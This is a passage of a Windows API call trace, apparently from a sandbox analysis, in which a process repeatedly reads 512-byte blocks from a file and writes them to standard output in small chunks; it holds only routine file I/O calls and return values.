[0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.610] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.610] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.611] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.611] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.611] GetFileType (hFile=0x50) returned 0x1 [0146.611] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.612] GetFileType (hFile=0x50) returned 0x1 [0146.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.613] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.613] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.613] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.614] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.614] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.614] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.614] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] GetFileType (hFile=0x50) returned 0x1 [0146.615] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.615] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.615] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.615] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.615] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] GetFileType (hFile=0x50) returned 0x1 [0146.616] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.616] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.617] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.617] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] GetFileType (hFile=0x50) returned 0x1 [0146.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.617] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.618] GetFileType (hFile=0x50) returned 0x1 [0146.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.618] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.633] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.633] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.633] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.633] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.634] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.634] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.635] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.635] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType (hFile=0x50) returned 0x1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.635] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.635] GetFileType 